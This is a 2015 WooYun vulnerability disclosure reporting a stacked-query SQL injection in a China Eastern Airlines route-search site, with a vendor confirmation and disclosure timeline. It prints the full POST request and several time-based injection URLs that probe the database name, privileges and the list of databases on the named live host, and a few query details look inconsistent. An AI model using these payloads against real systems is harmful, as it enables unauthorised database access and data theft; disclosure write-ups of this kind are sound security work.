当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146415

漏洞标题:中国东方航空某系统SQL注入(stacked queries注入,可跨34个库及数据)

相关厂商:中国东方航空股份有限公司

漏洞作者: 路人甲

提交时间:2015-10-13 19:56

修复时间:2015-11-27 21:00

公开时间:2015-11-27 21:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-23: 细节向核心白帽子及相关领域专家公开
2015-11-02: 细节向普通白帽子公开
2015-11-12: 细节向实习白帽子公开
2015-11-27: 细节向公众公开

简要描述:

希望不是 @Xmyth_夏洛克 大哥提交的那个地方吧~

详细说明:

目标站点:mceair.962008.com
发现注入点:(注入类型:stacked queries;注入参数:Post中的每个参数都存在)

POST /ROUTE/Default.aspx HTTP/1.1
Content-Length: 260
Content-Type: application/x-www-form-urlencoded
Referer: http://mceair.962008.com/ROUTE/Default.aspx?keyword=%u666E%u5409%u5C9B&KeyChannelType=
Cookie: ASP.NET_SessionId=zctv03hiojuo3ak5orwv4mqh; firstEnterUrlInSession=http%3A//mceair.962008.com/Control/Destination.aspx; Hm_lvt_55ef9cc1e851c15fa3e50aaa16afeeff=1444658930; Hm_lpvt_55ef9cc1e851c15fa3e50aaa16afeeff=1444658937; ROUTE=ouid=112624106&DESTINATION=%5b%22ToCity%7c%e6%99%ae%e5%90%89%e5%b2%9b%22%5d; FromCityCookie=FromCity=%e9%87%8d%e5%ba%86
Host: mceair.962008.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
keyBound=&KeyChannelType=&KeyDayAndNight=&keyMark=&keyMaxDate=1&keyMaxRate=1&keyMinDate=1&keyMinRate=1&KeyRouteArea=&KeyRouteType=&keySort=&KeyToCity=&KeyToCountry=&KeyToProvince=1&QuerySearch%24hfldChannelType=&__VIEWSTATE=/wEPDwULLTEwMjQ1NzE0NzFkZA%3d%3d


此处以KeyChannelType参数为例:

sqlmap.jpg


此处注入需要另加三个反括号闭合——“')))”,SQLMAP没跑出来,抓包看了下就是因为那三个反括号闭合没绕出来;不过既然是stacked queries注入,那手工报错注入来也很方便了。
当前数据库:sh962008

http://mceair.962008.com/ROUTE/Default.aspx?keyword=马尔代夫&KeyChannelType=')));IF(1=db_name()) WAITFOR DELAY '0:0:5'--


dbname.jpg


查了下,当前数据库用户并不是数据库管理员

http://mceair.962008.com/ROUTE/Default.aspx?keyword=马尔代夫&KeyChannelType=')));IF(IS_SRVROLEMEMBER('sysadmin')=1) WAITFOR DELAY '0:0:5'--


但是可以跨库,估计没配置好……
1、以下语句返回延时结果,可得出共34个库

http://mceair.962008.com/ROUTE/Default.aspx?keyword=%u9A6C%u5C14%u4EE3%u592B&KeyChannelType=')));IF((SELECT count(Name) FROM Master..SysDatabases )=346) WAITFOR DELAY '0:0:5'--


2、以下语句可跑出每个库的库名(top n in [1,34])

http://mceair.962008.com/ROUTE/Default.aspx?keyword=马尔代夫&KeyChannelType=')));IF((select top 1 name from sysobjects where xtype='U' and id not in(select top n id from sysobjects where xtype='U'))=1) WAITFOR DELAY '0:0:5'--


不一一列出,只举一例。

QQ拼音截图未命名.jpg


安全考虑,执行cmd命令、其他数据就不搞了

漏洞证明:

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-13 20:58

厂商回复:

已联系项目经理进行整改。

最新状态:

暂无


漏洞评价:

评论